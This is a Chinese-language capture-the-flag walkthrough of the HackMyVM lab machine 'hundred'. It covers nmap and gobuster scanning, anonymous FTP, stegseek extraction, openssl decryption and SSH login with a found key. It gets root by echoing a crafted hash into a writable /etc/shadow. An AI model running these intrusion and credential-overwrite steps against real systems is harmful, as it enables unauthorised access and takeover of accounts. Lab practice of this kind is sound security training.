信息搜集

主机扫描

arp-scan -l

端口扫描

┌──(root㉿kali)-[~]
└─# nmap -sV -p-   192.168.10.243
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-05-19 10:21 EDT
Nmap scan report for 192.168.10.243
Host is up (0.00029s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.3
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
80/tcp open  http    nginx 1.14.2
MAC Address: 08:00:27:BF:24:E1 (Oracle VirtualBox virtual NIC)
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 24.08 seconds

路径扫描

┌──(root㉿kali)-[~]
└─# gobuster dir -w /usr/share/seclists/Discovery/Web-Content/directory-list-lowercase-2.3-medium.txt -t 100 -b 403,404 -x .jpg,.png,.php,.txt,.html,.php  -u http://192.168.10.243       
===============================================================

/logo.jpg             (Status: 200) [Size: 7277]
/index.html           (Status: 200) [Size: 242]
Progress: 926242 / 1245864 (74.35%)^C
[!] Keyboard interrupt detected, terminating.
Progress: 927273 / 1245864 (74.43%)
===============================================================
Finished
===============================================================

ftp登录

利用匿名登录

ftp> ls
229 Entering Extended Passive Mode (|||49140|)
150 Here comes the directory listing.
-rwxrwxrwx    1 0        0             435 Aug 02  2021 id_rsa
-rwxrwxrwx    1 1000     1000         1679 Aug 02  2021 id_rsa.pem
-rwxrwxrwx    1 1000     1000          451 Aug 02  2021 id_rsa.pub
-rwxrwxrwx    1 0        0             187 Aug 02  2021 users.txt

批量下载所有文件

ftp> mget *
发现一个id_rsa,和user.txt,但都是fake,可恶,被骗了
1.这里我发现users.txt时还有一个思路,就是我以为这是ssh用户表,需要我用hydra爆破登录,但其实结果不是这样,关键在最后一句,用户名是结尾的hmv

80端口服务

  • 网站源码发现一个key,和一个logo.jpg,这个jpg是关键,没想到会藏东西,所以我认为,这个靶场是一个非常综合性的easy型靶场
  • 将图片下载下来
curl http://192.168.0.159/logo.jpg -o 123.jpg
stegseek -wl users.txt logo.jpg
[i] Found passphrase: "cromiphi"
[i] Original filename: "toyou.txt".
[i] Extracting to "logo.jpg.out"
cat logo.jpg.out
d4t4s3c#1  这里是看的别的师傅的wp,很奇怪,就是我没想到这个users.txt是这样用的,是我孤陋寡闻了,这个密码至关重要,后面会说到

这还没完,enc这个路径没访问呢,访问一下发现会下载下来,但无法打开,于是猜测是被加密了,通过搜索enc解密,发现需要用到用户私钥,可以联系到一起了,

 openssl pkeyutl -decrypt -in h4ckb1tu5.enc -out decrypto.txt -inkey id_rsa.pem 
cat decrypto.txt 
/softyhackb4el7dshelldredd

又发现一个路径,访问看看

这什么意思?,没懂,通过小白师傅的wp发现还需要用gobuster扫描,我去好吧

[01:39:22] 200 -    2KB - /softyhackb4el7dshelldredd/id_rsa

好家伙,发现id_rsa,终于真相大白了,于是直接下载使用,用户hmv

获取shell

┌──(root㉿kali)-[/home/kali/Downloads]
└─# ssh -i 'id_rsa(1)' hmv@192.168.10.243
Enter passphrase for key 'id_rsa(1)': 
Linux hundred 4.19.0-16-amd64 #1 SMP Debian 4.19.181-1 (2021-03-19) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Mon Aug  2 06:43:27 2021 from 192.168.1.51
hmv@hundred:~$ ls

你会发现需要密码,密码在哪呢,对就是那个图片,

d4t4s3c#1 

直接拿下shell

提权

老步骤

  1. sudo-1权限不够
  2. 定时文件 * user-name command to be executed **** root cd/opt/secret/&&tr-zcf
    /var/backups/secret.tgz *
    17 **** root cd / && run-parts -- report/etc/cron.hourly
  3. 可利用suid命令:find/-perm-u=s-type f2>/dev/null
  4. 可用文件:/usr/sbin/getcap-r/2>/dev/null
  5. 查看端口:ss-altp发现本机还有运行一个网站服务开始信息搜集一下
  6. 查看有无可写文件find/-writable 2>/dev/null

发现一个文件可写(6) openssl passwd(生成加密的密码) - 苦咖啡~~ - 博客园 (cnblogs.com)

/etc/shadow
 openssl passwd
echo 'root:qdbEWfKM1ov2g:18888:0:99999:7:::' > /etc/shadow
最后直接root/root拿下靶机

知识点

  1. 信息搜集
  2. enc文件的解密
  3. shadow文件的写入
  4. ftp的文件的批量下载 mget *